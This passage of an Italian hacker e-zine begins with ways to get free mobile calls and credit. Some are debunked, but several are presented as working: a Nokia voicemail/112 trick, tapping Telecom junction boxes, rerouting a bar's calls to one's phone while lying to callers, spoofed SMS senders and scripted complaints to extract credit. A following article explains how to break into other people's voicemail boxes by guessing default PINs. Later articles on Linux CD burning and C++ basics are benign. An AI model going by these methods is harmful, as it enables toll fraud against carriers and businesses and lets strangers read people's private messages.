Comunque, per la cronaca, questo è il secondo metodo che io abbia mai provato
per ricaricarmi gratizz il cell e poco dopo ho scoperto che anche questo
sistema non è altro che una balla spaziale! Può anche essere vero che quei
programmi generano 1 codice giusto su 20 o 30 ma il problema resta che i
gestori di telefonia mobile, dopo un po' di codici errati da parte di un
utente, gli disabilitano la Sim Card così che potranno ricevere ed effettuare
chiamate (effettuarle solo se si hanno ancora un po' di soldi nella rucarica
precedente, questo è ovvio) ma non ricaricarsi il cell (anche se si ha un
codice corretto e funzionante) perchè questa opzione viene disabilitata (o
almeno così fa la Tim). A questo punto dovete chiamare il Servizio Tecnico e
nel giro di un'ora o poco più vi sistemano tutto il casino che avete fatto.
Comunque per quello che ne so io la Tim disabilita la Sim Card dopo 9
tentativi erratti (quella volta che ci provai io, i tentativi sbagliati erano
più di un centinaio...) ma delle altre compagnie tipo Omnitel non ho altre
info.

CENTRO MESSAGGI
---------------

Ed eccoci al mio primo metodo usato per scroccare... Che pure questo non
funziona... E gli sms li pagate lo stesso... Andate sul Menu ---> Messaggi
---> Selezione Set messaggi ---> Set1 ---> Numero centro messaggi - e
impostate come nuovo numero quello della Netcom (azz, raga, scusate ma ho
perso il numero.. non lo trovo più..). Dicevano che impostando il centro
messaggi della Netcom non pagavate gli sms ma questo non è assolutamente vero
e gli sms li pagate come sempre...

CELL NOKIA E SCHEDA OMNITEL
---------------------------

Questo è un sistema che io stesso ho provato e allo stesso tempo l'unico che
ho personalmente visto funzionare.
Dovete semplicemente avere un cell Nokia 3210 (per quello che ne so io questo
metodo non funziona su altri modelli) e una scheda Omnitel a credito 0.
Prima di tutto dovete disabilitare il PIN iniziale. Spero sappiate come si fa!
[Per i meno "esperti", Menu ---> Impostazioni ---> Impostazioni di sicurezza
---> Richiesta codice PIN - e impostate no]
Ora andate sul Menu ---> Messaggi ---> Imposta casella vocale - e inserite il
numero che volete chiamare.
Ora telefonate al 112, spegnete e riaccendete il cell. A questo punto premete
il tasto 1. Se avete svolto tutto bene, non vedrete comparire il logo ma in
compenso la vostra telefonata verrà inoltrata! Attenzione: non fate cazzate,
anche perchè se così fosse verrete denunciati dagli stessi carabinieri oppure
vi disabilitano la Sim Card e ve la riattivano solo quando avete pagato tutte
le telefonate che avete fatto a sbafo... E non sarete di certo i primi (non
stavo parlando di me!;-)).


TARIFFA AUTORICARICA DELLA TIN E CENTRALINE
-------------------------------------------

Ok, questo funzia ma non l'ho mai provato (almeno quando avevo la Sim Card
della Tin con tariffa Autoricarica 190). Trovate e aprite una centralina
telefonica della Telecom (molti articoli su come fare per aprirle li trovate
sul mio sito e su qualche e-zines, basta un po' di ricerca); con una beige box
telefonate al vostro cellulare, andate via e tornate dopo un po' di tempo
quando il cellulare si è ricaricato... Attenti, perchè non so quante
possibilità avete di essere beccati!

??????????????
--------------

Ieri sera, verso mezzanotte, ero ancora sveglio e non avevo proprio sonno...
Poi ero assalito da un caldo... Va beh, siamo anche in estate... E mi è venuto
un lampo d'idea in testa... Non vi garantisco nulla, ma ho forse ho trovato un
altro modo per ricaricarsi il cell... Vi farò sapere tra qualche giorno,
quando uscirà la nuova versione 1.5 di questo articolo... Byezz Elektro

YYYY CON SCHEDA OMNITEL
-----------------------

Altra balla che girava su Internet... Dicevano che quando mandavate sms, prima
del messaggio da spedire dovevate digitare "YYYY" e queste 4Y vi facevano
mandare gratizz gli sms[Es: YYYYmessaggio oppure YYYY<spazio>messaggio]. Tutto
questo non è vero, così facendo, riceverete solo la notifica del messaggio
arrivato a destinazione, e sarà una cosa simile a questa: <STATUS>
Delivered Message to:
03xx-xxxxxxx (Data e ora)
(*sc:0)

TRUCCO DEL TASTO C
------------------

Anche questo trucco ho trovato per la rete ma a me non funziona e mi sa tanto
che sarà lo stesso anche per voi... Questo sistema serve per mandare gli sms a
scrocco: dovete semplicemente inviare il messaggio e prima che compaia la
scritta "Messsaggio Inviato" premere il tasto C. Secondo l'ideatore di questo
sistema (non so chi sia, altrimenti vi scriverei qui il suo nick... così poi
non venite a dirmi che scoppiazzo le idee altrui), così facendo il messaggio
non arriva nel centro messaggi e quindi non viene addebitato. Ho provato
questo metodo, ma non funziona, e in ogni caso mi sono posto due domande:
1) Se l'sms non arriva al centro messaggi, di conseguenza non arriva nemmeno
al nostro destinatario! Sbaglio forse??
2) Invece di premere C che con me non succede un bel nulla e il messaggio
viene inviato come niente fosse (tenete conto che io ho un cell Nokia 3210 con
scheda Omnitel), non sarebbe meglio spegnere il cell, così siamo un po' più
sicuri che il nostro messaggio non arrivi al centro messaggi?? Ma se non
arriva al centro messaggi io ho ancora il dubbio che mi sono posto nella prima
domanda...

TRASFERIMENTO DI CHIAMATA
-------------------------

Le info qui sotto sono state scritte da Screener_it, nel suo articolo
"Ricaricarsi il cellulare", che potete trovare al sito della sua crew,
www.tankcommandos.org.

Un altro metodo è il trasferimento di chiamata applicato al cellulare..
'Spetta che spiego meglio !!
Premetto che questo metodo l'abbiamo inventato io e XXXXX (scusa ma non
ricordo proprio il tuo nick nè riesco a trovare il log della nostra
discussione su #Phreak.it).
Testato su cellulari TIM con l'opzione AUTORICARICA 190, per gli Omnitel e
Wind non và.
Dunque.. Il trucco del trasferimento di chiamata lo conoscete (chi non lo
conosce vada nella sez. TESTI DEGLI ALTRI del sito del Tank Commandos e
troverà il testo "Truffa telefonica con il trasferimento di chiamata").
L'unica cosa che dovete cambiare è che come numero di destinazione metterete
il numero del vostro cellulare.
Ogni chiamata che sarà fatta al bar vi verrà trasferita al cellulare e per
ogni minuto di telefonata riceverete mi pare 70 £ che non è male.. Quando vi
chiamano chiedendovi se siete il tal barista dite che la sua linea deve avere
qualche problema xkè continuate a ricevere voi le chiamate dirette a lui e non
riuscite a spiegarvene il perchè.
Se vi chiedono chi siete mi pare logico che darete dati falsi e dite che
abitate in paesi lontani (se vi chiamano da Verona dite che siete di Milano,
ecc..).

MYGSMBOX.COM
------------

Le info qui sotto sono state scritte da Screener_it, nel suo articolo
"Ricaricarsi il cellulare", che potete trovare al sito della sua crew,
www.tankcommandos.org.

C'è poi il metodo di MYGSMBOX.com che mi è venuto in mente qui in Irlanda ma
devo ancora testarlo.
Come ben sapete (e chi non lo sa lo saprà adesso) spedendo i messaggi SMS con
MYGSMBOX.com potete fare in modo che come numero del mittente appaia qualsiasi
numero di cellulare vogliate, al contrario ad esempio di Kataweb, iol.it,
ecc.. che mettono come numero di origine numeri standard come 2424 o altro,
adesso non mi ricordo con precisione..
Cmq iscrivetevi a MYGSMBOX.com e mettete con numero del vostro cellulare un
qualsiasi numero TIM (033X XXX XXXX) e poi, sempre ammesso che abbiate attivo
il servizio di AUTORICARICA 190, speditevi i messaggini e ricaricatevi di 25£
per ogni messaggio.

BUG MOTOROLA 8200
-----------------

Le info che seguono sono state prese da AIS1 (Anarchy in the System numero 1)
e scritte da "Cyborg".

Ho trovato un bug in motorola 8200, utilizzo normalmente una comune scheda
GSM TIM ma, ho riscontrato (sostituendo alla mia TIM card una scheda
OMNITEL con credito zero!!) che posso chiamare GRATIS!!
Da un indagine che ho fatto, non è un problema del mio cell. ma di tutti
gli 8200, c'è chi mi ha scritto in mail, dopo la pubblicazzione sul sito e
sulla ML degli SpaghettiPhreackers [mitici!!], dicendomi che riesce ad
usare lo stesso mio trucchetto ma, con un problema di linea o di
distorsione del segnale, io onestamente non ne ho.

BUG DEL CELL SAMSUNG MODELLO SGH600
-----------------------------------

Sempre per il fatto che odio tutti quelli che scopiazzano gli articoli altrui,
vi dirò che questo bug è stato descritto "dR`sP3nKy" in AIS2.

NON So` Se Kuesto Trukketto Funzioni Ankora.

Se avete una skeda rikarikabile Omnitel potete farvela rikarikare *gratis* ,
kuesto dipende da kuanto usate il vostro cell per mandare Sms.
Dovete sapere ke il cellulare della Samsung ,modello SGH600 , non supporta
bene la skeda Omnitel , kuindi ki ha la sfortuna di averlo komperato e usa
skeda Omnitel si ritrova degli addebiti Sms numerosi anke se non ha usato il
servizio Sms kosi' tanto.

Ekko kome fare :

Kiamate il 190 (cioe' il centro servizi della Omnitel),dite all'operatore e
all'operatrice kon voce un pokino inkaxxata ke kuando parlate al cell secondo
voi skalano troppi soldi anke se parlate poko.
Kiedete se vi kontrollano il credito (dato ke il credito non sta sulla skeda).
Dite ke avete il SGH600 della Samsung.L'operatore vi dira' ke se avete kuesto
cell il problema rimarra'. Rispondete ke avete venduto il cellulare e ora ne
avete un altro. L'operatore vi aumentera' il credito,dipende, kome ho detto
prima, da kuanto usate il vostro cell.
Se bekkate l'operatore stronzo tentate a kiamare piu' tardi e provate kon un
altro operatore.

LADRI BASTARDI
--------------

Ci sarebbe poi un ultimo metodo "alternativo"... Andate in edicola e rubate
una o più ricariche! [Dal txt di Screener_it, fondatore della TCC!]
Inutile dire che questo metodo fa schifo e personalmente lo trovo scorretto...
Un conto è telefonare e addebitare una telefonata all'Omnitel (ad es. col
trucco del 112), un altro è fottere un povero commerciante che fa il suo
lavoro e quindi vende ricariche. E poi noi non siamo ladri! Capito?

***************
* CONCLUSIONI *
***************

Grazie a tutti voi per l'attenzione... se l'avete avuta... ;-)))
In ogni caso per considerazioni, consigli, altri nuovi metodi per telefonare
gratizz con i cell e/o altro sul phreak contattatemi per mail a
teo1987@libero.it [Se mi mandate mail, rispondo a tutti però, perfavore, non
mandatemi mail dicendo: "Si, questo metodo sarebbe anche abbastanza
interessante però a me da un po' di fastidio usarlo ogni volta che devo
telefonare... Non ne conosci altri per caso? O cmq che mi eviti tutta questo
trafficare??"
. Anche perchè se usare questi metodi vi da tutto questo
fastidio, che vi posso dire, andate a COMPRARVELE ste' ricariche, pagate,
telefonate e COMPRATE ancora.. tanto i soldi sono vostri! ;-))]. Mi riservo di
aggiornare questo articolo con nuovi metodi se in futuro se ne scoprissero
altri e pubblicherò, sempre sul mio sito le nuove versioni (ovviamente se i
metodi li avete scoperti voi, inserirò qui il vostro articolo assieme al
vostro nome). Da Elektro, anche oggi è tutto!! Perciò vi saluto e vi auguro
buone scroccate (se ce la fate!!)! ;-))

Azz, dimenticavo, un ringraziamento particolare va a tutti quelli che hanno
scritto txt descrivendo i metodi per telefonare o ricaricarsi il cell, di cui,
come avrete letto, alcuni loro sistemi li riporto anch'io in questo txt,
assieme ai loro nomi, ovviamente.

ByeZzZ raga!


|-----------------------------------------------------------|
|Art. N° <13> : "Abuso di segreterie telefoniche" di Elektro|
|-----------------------------------------------------------|


<> ------------------------------- <>
<> <>
<> ABUSO DI SEGRETERIE TELEFONICHE <>
<> <>
<> By <>
<> :: Elektro :: <>
<> ------------------------------- <>

Autore: Elektro
Ora: 9.06 27/06/01
E-mail: teo1987@libero.it
Web: www.mondohackers.cjb.net [X-System.cjb.net ;) MondoHackers non esiste
+... ;))]
Musica: Radio Company Dance
Cibo: nulla, solo tanta acqua, col caldo che fa!!
Tempo impiegato: qualche minuto del mio tempo

---------
DiSCLiMER
---------

Non mi assumo nessuna responsabilità sull'uso illegale nell'applicazione delle
informazioni contenute in questo articolo. Se vi beccano e qualcuno vi fa il
culo, sono solo affari vostri, io pubblico questo articolo con unico scopo
educativo ed informativo per dimostrare quali possono essere i "bug" delle
segreterie telefoniche e la mancanza di sicurezza che non viene fornita da
parte delle compagnie telefoniche.

-----
iNTR0
-----

In questo articolo vi illustrerò com'è possibile, in maniera semplicissima,
accedere alle segreteria telefoniche, riuscendo a modificare le impostazioni
(dal messaggio di benvenuto al codice di identificazione personale ma anche
molto altro...) ma anche a leggere gli eventuali messaggi. Il tutto si
suddivide in:
1) Segreteria Memotel
2) Segreteria Tim
3) Segreteria Wind
4) segreteria Omnitel

----------------------
[1] Segreteria Memotel
----------------------

Alla Telecazz un giorno venne la bella idea di creare una segreteria che si
attivava chiamando un semplice numero telefonico e bastava chiedere
l'attivazione senza la cassettina audio che registra i messaggi lasciati.
Sponsorizzarono il tutto su delle schede telefoniche... Ricordate?? In ogni
caso non importa non è questo quello che conta! Allora, ste' segreterie
Memotel sono sempre più usate anche perchè più comode rispetto alle vecchie
segreterie con la cassettina ma il problema sta nel fatto che sono buggate...
Va beh, meglio per noi che sappiamo tutto (o quasi...)!! ;-)
Telefonate a un vostro conoscente o cmq una persona che sappiate abbia sta'
segreteria Memotel, lasciate suonare il telefono e aspettate che risponda la
segreteria; una volta che siete collegati con la segreteria digitate # dal
vostro telefono. Vi risponderà una voce che vi dirà "Inserisca il suo codice
di identificazione personale"
o una cosa simile. Voi a questo punto digitate
1234 seguito subito da #. Il codice 1234 non è altro che il codice
preimpostato da quelli della Telecazz ma di solito poche persone lo cambiano;
ma anche se qualcuno fosse più furbo del previsto, non mollate, provate altri
codici stupidi tipo 1111, 9876, 5555, la sua data di nascita, i numeri della
targa della macchina o del numero di telefono, sempre poi seguiti da #. Ma non
vi preoccupate, di solito non dovreste aver difficoltà ad entrare (al massimo
fate social engineer...;-))! Una volta dentro alla segreria avrete una guida
che vi illustrerà le varie opzioni che potete modificare e, ovviamente, pure
ascoltare gli eventuali messaggi per poi scegliere se eliminarli o archiviarli.

------------------
[2] Segreteria Tim
------------------

Ed eccoci alle segreteria telefoniche della Tim che girano sui cell... Che vi
posso dire, tutto quello che dovete fare è lo stesso identico lavoro delle
segreterie Memotel. L'unica differenza sta' nel fatto che il codice
preimpostato da quelli della Tim è il 1111, perciò consiglio di provare quello
per primo. Poi quando siete dentro ascoltate sempre la voce della guida.
Insomma tutto uguale!

-------------------
[3] Segreterie Wind
-------------------

Spesso ho sentito parlare e ho anche letto diversi articoli sull'abuso delle
segreterie Memotel e Tim, ma non avevo mai sentito dire che anche le
segreterie Wind e Omnitel potessero essere buggate. Visto che il cell della
mia ex ragazza, ha una bella segreteria Wind ero pure invogliato dal provare
ad hackerarlo...
Così ho provato e ho scoperto che anche le segreterie Wind sono vulnerabili a
quest' "attacco", l'unica differenza nel procedimento sta' nel fatto che
invece di premere # bisogna premere l'*. Si inserisce il codice, l'* e se
siamo un po' fortunati siamo dentro e ascoltiamo la voce della guida.

----------------------
[4] Segreterie Omnitel
----------------------

Stesso identico lavoro delle segreterie Wind.

-----------
C0NCLUSi0Ni
-----------

E siamo arrivati alle conclusioni... Che dirvi, con questo testo non avrete
imparato chissà cosa di certo ma penso possa sempre essere utile e dimostra la
totale mancanza di sicurezza da parte delle compagnie telefoniche, che
potrebbero migliorare la situazione... In ogni caso, io consiglio a tutti voi
di togliere la segreteria sui vostri cell (se l'avete impostata) oppure
inserire un codice difficile da trovare anche perchè penso non siate così
felici se altre persone leggessero tranquillamente i vostri messaggi a vostra
insaputa...
Penso abbiate capito tutto di questo articolo, anche perchè più facile di così
non ve lo potevo fare... In ogni caso se avete domande, consigli e/o
considerazioni la mia mail è teo1987@libero.it.


|--------------------------------------------------------------------------|
|Articolo sulla Box... Dovrebbe essere qui... Cazzo... Invece ho dovuto |
|ricorrere qualche giorno fa a una brutta formattazione :-( e tra le mille |
|cose mi sono dimenticato di salvare l'articolo che avevo appena finito di |
|scrivere sulla varie Box... Scusatemi, se ho voglia lo riscriverò per il |
|prox |numba dell'e-zine ;) altrimenti... uhmm.. Scriverò qualcos'altro ;-)|
|--------------------------------------------------------------------------|


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| L I N U X |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################



|--------------------------------------------------|
|Art. N° <14> : "Masterizzare sotto linux" di Bartx|
|--------------------------------------------------|


[Installare, configurare ed usare un masterizzatore ide sotto linux]

Introduzione
Il software
I moduli del kernel
Cdrecord
Creare un'immagine iso da una directory
Esplorare un'immagine iso
Masterizzare un'immagine iso
Cd Audio
Letture consigliate




<<<<<<<<<<<<<<<<<<<<<<<<<<< Introduzione >>>>>>>>>>>>>>>>>>>>>>>>>>>

Siccome ho avuto non pochi problemi nella installazione del
masterizzatore, nella sua configurazione e nella ricerca e nell'uso del
software, ho deciso di scirvere questo breve tuttorial che accompagna
l'utente passo per passo verso la giusta configurazione della
periferica.
Ho deciso di concentrarmi sui masterizzatori ide (eide) xchè sono i più
popolari, i più economici ed i più difficili da configurare.









<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Il software >>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Sono necessari per masterizzare:
cdrecord programma di scrittura su cd
mkisofs programma per la creazione di iso
cdda2wav serve per estrarre tracce audio dai cd


Opzionali
X-cd-roast gui grafica per cdrecord
kisocd gui grafica per cdrecord per kde







<<<<<<<<<<<<<<<<<<<<<<<<< I moduli del kernel >>>>>>>>>>>>>>>>>>>>>>>>>

I masterizzatori ide, per funzionare sotto linux, hanno bisogno di
funzionare in emulazione scsi, cioè essere adoperati dal sistema come
se fossero tali.
Inoltre, se il masterizzatore è riconosciuto come cdrom ide non potra
esse riconosciuto ancher come masterizzatore. Per un corretto
funzionamento modificare le seguenti opzioni nel kernel:

digitare da root:
cd /usr/src/linux-x.x.x
make xconfig

e scegliere le seguenti configurazioni:

[Enhanced IDE/MFM/RLL...]
IDE/ATAPI CDROM M (NON mettere assolutamente Y)
SCSI hostadaptor emulation Y
Loopback device Y (serve per esplorare le iso come se fossero cdrom)


[SCSI support]
SCSI support Y
SCSI CD-ROM support - Enable vendor-specific Y
SCSI generic support Y



[Filesystem]

ISO 9660 CDROM filesystem Y
Microsoft Joliet cdrom Y


Una volta fatte le seguenti modifiche, salvate e d uscite.
Digitate poi:

make dep
make bzImage
make modules
make modules_install

il kernel è compilato, ora non vi resta che copiare l'immagine del
nuovo kernel nella directory di boot:

cp /usr/src/linux-x.x.x/arch/i386/boot/bzImage /boot/newkernel


e aggiungere le impostazioni per fare partire il nuovo kernel al
lilo.conf:


image = /boot/newkernel
#va sostituito dalla dir e dal nome che avete dato al nuovo kernel

root = /dev/hdx
#hdx va sostituito con il vostro device (copiatelo da quello sopra)

label = NewLinux #Etichetta da dare al nuovo kernel
read-only #lasciare così




Dopo fatto ciò digitate lilo da root.







<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Cdrecord >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Finito con il kernel riavviate e caricate il nuovo kernel.


Dopodichè controllate se avete installato cdrecord digitando da root
cdrecord -h:

se il programma non c'è scaricatelo da http://freshmeat.net ed
installatelo (tar xvfz cdrecord-x.x.x , cd cdrecord-x.x.x , ./configure
, make , make install).


Ora, se avete configurato correttamente i moduli del kernel, digitando
cdrecord --scanbus dovrebbe apparire una lista simile a qesta:

0,0,0 0) 'Philips ' 'CDRW PCCD048 ' 'CD WRITER'
0,1,0 1) 'Philips ' 'CD-ROM PCCD048 ' 'CD-ROM'
0,2,0 2) *
0,3,0 3) *
0,4,0 4) *
0,5,0 5) *
0,6,0 6) *
0,7,0 7) *


Questa è la lista dei device. Nel mio caso il primo è il masterizzatore
ed il secondo il lettore cdrom.
Nel caso non vi apparisse nulla bisogna ricontrollare i moduli.



A questo punto prendete nota del device del masterizzatore (a me è
0,0,0), che userete per masterizzare.














<<<<<<<<<<<<<< Creare un'immagine iso da una directory >>>>>>>>>>>>>>




Prima di cominciare a masterizzare è consigliabile fare un'immagine dei
file che si vogliono scrivere.
Per fare ciò mettete i file che volete copiare in una dir e scrivete:

mkisofs -R -o immagine.iso /directory/sorgente

dove immagine.iso è il nome da dare all'immagine e /directory/sorgente
è il nome della directory che contiene i file da masterizzare.

Con questo metodo si può fare anche la copia di cdrom:
basta montare il cdrom (es:mount /dev/cdrom /mnt/cdrom) e sostituire il
mount point alla directory sorgente. Es:

mkisofs -R -o immagine.iso /mnt/cdrom










<<<<<<<<<<<<<<<<<<<<< Esplorare un'immagine iso >>>>>>>>>>>>>>>>>>>>>

A volte potrebbe presentarsi la necessità di esplorare, modificare o
controllare le immagini iso prima di procedere alla masterizzazione.
Per montare un'immagine iso come se fosse un cdrom si può procedere nel
seguente modo:

mount nome_immagine -r -t iso9660 -o loop /mountpoint

es: mount immagine.iso -r -t iso9660 -o loop /mnt/cdrom


(ora sapete a che serve il loop nel kernel ;-)









<<<<<<<<<<<<<<<<<<<< Masterizzare un'immagine iso >>>>>>>>>>>>>>>>>>>>


Dopo aver creato la vostra bella immagine iso e averla controllata, non
vi resta che masterizzarla su cdrom:



cdrecord -v speed=2 dev=0,0,0 immagine.iso

dove:
2 è la velocità di scrittura
0,0,0 è il device del masterizzatore (ricordate cdrecord --scanbus???)
immagine.iso è il nome dell'immagine iso che volete masterizzare.











<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Cd Audio >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


Per estrarre le tracce dai cd è necessario cdda2wav.
Le tracce si estraggono nel seguente modo:
cdda2wav -D /dev/scd0 -S 2 -B -t 1+5

a /dev/sc0 va sostituido il device del lettore cdrom
a 2 la velocità di estrazione
e a 1+5 la traccia da cui si vole iniziare ad esrtrarre e quella finale
se si vuole estrarre tutto il cd omettere l'ultimo parametro (-t 1+5)


Per masterizzare i cdaudio basta inserire l'opzione -audio a cd record
seguita dal nome delle tracce che si vogliono masterizzare.

es:
cdrecord -v speed=2 dev=0,0,0 -audio track1.wav track2.wav track2.wav
(ecc...)

Consiglio di non masterizzare le tracce audio ad una velocità superiore
a 2. queste potrebbero presentarsi sporche o potrebbero saltare.













<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Various >>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Per provare la masterizzazione prima di scrivere basta inserire
l'opzione -dummy

Es: cdrecord -v -dummy speed=2 dev=0,0,0 immagine.iso

Il programma proverà la masterizzazione a laser spendo.













<<<<<<<<<<<<<<<<<<<<<<<<< Letture consigliate >>>>>>>>>>>>>>>>>>>>>>>>>


kernel howto
cdwrite howto
man cdrecord
man mkisofs
man cdda2wav




by bartx


Un particolare saluto a tutti gli amici di #hack #noflyzone #smanettoni
#hx #free.it.warez #slackware #mojodo e tutti quelli che mi sono
dimenticato.


|------------------------------------------------------|
| Art. N° <15> : "Linux: Le basi - Premessa" di Elektro|
|------------------------------------------------------|


: E : L : E : K : T : R : O :

presenta ;) (insomma... stile film americani...ihih :)))

# L I N U X : L E B A S I #
By Elektro

Versione 0.5

PREMESSA
--------

Linux negli ultimi anni ha avuto un'esplosione a dir poco spaventosa.
Sempre più utenti si stanno avvicinando a questo sistema operativo
complesso ma molto flessibile e adattabile. Io per primo è da pochi mesi
che mi sono avvicinato alla scoperta di questo potente OS e piano piano
sto scoprendo tutti i suoi vantaggi e tutta la sua adattabilità.
I destinatari di questa guida non sono di certo amministratori di sistema
ma utenti che si sono avvicinati da poco alla scoperta di questo
interessante sistema.

Per la lettura di questa guida sono richieste un minimo di conoscenze
informatiche (molto poche non vi preoccupate..) e tutti i termini in
relazione ai sistemi Unix-Linux verranno spiegati in questi volumi su
Linux.

Inoltre la guida sarà divisa in volumi, i quali conterranno a loro volta un
determinato argomento e potranno anche essere distribuiti man mano che il
sottoscritto li scrive.

FONTI
-----

Tutte le fonti da cui ho tratto le informazioni per poter scrivere questa
guida, verranno scritte alla fine della guida.

COPYRIGHT
---------

Questa guida può essere pubblicata in qualsiasi sito internet, può essere
stampata e riprodotta ovunque, integralmente o parzialmente purchè non ne
venga modificato il nome dell'autore (Elektro).


|-----------------------------------------------------|
| Art. N° <16> : "Linux: le basi - Storia" di Elektro |
|-----------------------------------------------------|


LINUX : LE BASI
By Elektro


LA NASCITA DEI SISTEMI LINUX
----------------------------

I sistemi Unix sono molto diffusi in campo professionale, poichè
supportano bene concetti molto importanti, come ad esempio, il
collegamento in Rete. L'unico loro difetto è il prezzo molto alto che
arriva a raggiungere anche la cifra modesta di parecchi milioni.
Proprio per evitare tutto ciò Andrew Tannembaum, professore d'informatica
tedesco, negli anni '80 decise di sviluppare un nuovo sistema operativo
basato sullo Unix; il nuovo 'mini-sistema' prese il nome di 'Minix'.
Decise quindi di vendere l'OS, per soli 150 dollari in modo che studenti o
semplici appassionati potessero avvicinarsi al mondo dello Unix senza
spendere una cifra esorbitante per comprare un potente OS commerciale.
Poco tempo dopo, nella primavera del 1991, Linus Torvalds, uno studente
finlandese postò su comp.os.minix il seguente messaggio:

"ricordate i vecchi tempi, quando gli uomini erano uomini e si scrivevano
da soli i device driver? Non siete stufi che tutto funzioni al primo
colpo? Non avete nostalgia delle lunghe notti passate a lottare per far
andare il computer? Se tutto questo vi manca sto lavorando al kernel d'un
clone Unix..."


Con questo annuncio veniva ufficializzato il nuovo sistema, disponibile
allora su ftp.funet.fi dove si poteva scaricare il kernel 0.0.1. Il nuovo
OS aveva il nome di 'Freax', ma gli amici di Torvalds insistettero perchè
venisse dato il nome di 'Linux', come un omaggio al creatore e poi perchè
suonava decisamente meglio.

Da allora moltissime persone in tutto il mondo cominciarono ad
interessarsi del nuovo progetto e nel '93 venne pubblicata la prima
versione di Linux, disponibile solamente su Internet.
L'intero sistema occupava una decina di MB e doveva essere compilato da
zero; occorrevano quindi un po' di competenze per usufuirne.
Successivamente, Debian e Slackware, furono le prime a inserire tutto il
software in un cd-rom, così da permettere un'installazione anche a chi non
aveva grandi competenze informatiche.
Il resto è storia! ;) Successivamente nacquero i primi gruppi di
discussione locali, i giornali interamente dedicati, nel '95 Linux viene
usato per fini commerciali, nacquero altre distribuzioni, quali Caldera,
Linux FT, WGS Linux e Red Hat. Nel '96 nasce anche TUX, il pinguino che
non è altro che la mscotte del sistema.
Nel dicembre '96, infine, venne rilasciata la versione 2.0 del kernel e da
allora Linux conobbe uno sviluppo enorme di stabilità e di sicurezza.


|------------------------------------------------------------------------|
| Art. N° <17> : "Linux : Le basi - Caratteristiche tecniche" di Elektro |
|------------------------------------------------------------------------|



LINUX : LE BASI
By Elektro

LE CARATTERISTICHE TECNICHE

vol.2

Ma vediamo ora come può essere rapportato linux ad altri sistemi operativi.
Innanzitutto linux ha un grande pregio che altri OS non hanno; ovvero è
gratuito e essere copiato e distribuito da chiunque. I codici sorgenti (dal
kernel a qualsiasi programma) sono a disposizione di chiunque. Di conseguenza
chiunque può scrivere programmi ed ecco spiegato il perchè di questo grande
coinvolgimento di migliaia di programmatori in tutto il mondo. Inoltre gli
studenti hanno potuto, proprio grazie a linux e al suo concetto di OpenSource,
studiare un intero sistema operativo, che non è secondo a nessun altro
prodotto commerciale.

Ma quali sono le caratteristiche tecniche di questo potente OS? Iniziamo con
il dire che sono parecchie... Ecco qui di seguito le principali:

- Multitasking: ovvero la possibilità di eseguire più programmi in uno stesso
momento (mica male... ;)).
- Multiuser: più utenti possono usare la stessa macchina. E ogni utente ha
determinati diritti sui file, con la possibilità o meno di leggere, scrivere o
eseguire i file. Vedremo il tutto più avanti.
- Multiplatform: è in grado di girare su diverse piattaforme (non solo INTEL
ma anche Digital Alpha, PowerPC, Sun SPARC, Macintosh e MIPS)
- Richiede User e Pass ad ogni utente, il che garantisce una certa sicurezza
nella gestione del sistema.
- Prevede funzioni della memoria tra i processi che non permette a un solo
programma di mandare in crash l'intero sistema operativo (linux rulezz.. altro
che schermate blu.. ;))).
- Console virtuali multiple: normalmente si ha accesso con le combinazioni di
tasti ALT-F1, ALT-F2, ..., ecc.Si può arrivare fino a 64 sessioni parallele,
ma tutte contemporanee e indipendenti l'una dall'altra. Anche se questo vi può
sembrare una cosa strana in realtà ben presto vi accorgerete dell'utilità di
tutte queste console! ;)
- networking TCP/IP nativo

Queste sono le principali caratteristiche tecniche, anche se poi ce ne
sarebbero molte altre... Ma penso proprio che per voi possano bastare queste!

Quindi da queste informazioni che avete appena letto penso proprio che non sia
io quello che vi deva dire come si rapporta linux agli altri OS.
Al massimo potete passare nuovamente in rassegna tutte queste caratteristiche
e pensare se i sistemi Microsoft hanno queste caratteristiche e poi le
conclusioni le traete da soli. ;)


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|-----------------------------|1ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| P R O G R A M M A Z I O N E |0%101ð0101|010:10&101
01*010&101µ01þ010@10101½|-----------------------------|0°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


|----------------------------------------|
|Art. N° <18> : "C++ : Le BaSi" di Marvin|
|----------------------------------------|


######################
MARVIN
mh@altavista.it
######################


Ciao a tutti.

Cominciamo subito che non ho molto tempo da perdere.

In questo breve tutorial cercherò di fornirvi qualche base della
programmazione in C più più.Non pretendo di guidarvi passo

passo nella creazione di un videogioco(il che richiederebbe
mooooooooooooooooooooooolto tempo),ma le poche cose che apprenderete

vi serviranno per realizzare piccoli programmini,come somme,divisioni e
cazzatine varie.

Vi chiedo scusa in anticipo per eventuali errori di battitura o altro,ma sono
le 4 di notte di Lunedì 24 Dicembre e ho tanto vino

in corpo da far sembrare Andy Capp un astemio,in più mi circolano sostanze
strane provenienti dall'Olanda che è meglio non

nominare...

Ma prima parliamo delle cose di cui avrete effettivamente bisogno per creare
il vostro primo programmino:

-tempo

-cibo

-Un compilatore per Windows(come il Borland C++,ma ne trovate altri da
scaricare gratuitamente su Internet -vedi Icc e varie-) o

uno per Linux(ogni edizione ne incorpora uno,assieme a quello per C.Io che uso
RedHat 7.1 ho a disposizione il Kdevelop)
-che volete ancora?



Il C++ è un linguaggio simile per sintassi al C,ma non commettete l'errore di
considerarlo come un'estensione di esso.E' un

linguaggio a sè stante e necessita del rispetto che gli è dovuto.E' simile per
sintassi al Java2(il Java2 prende spunto dal C++,ma

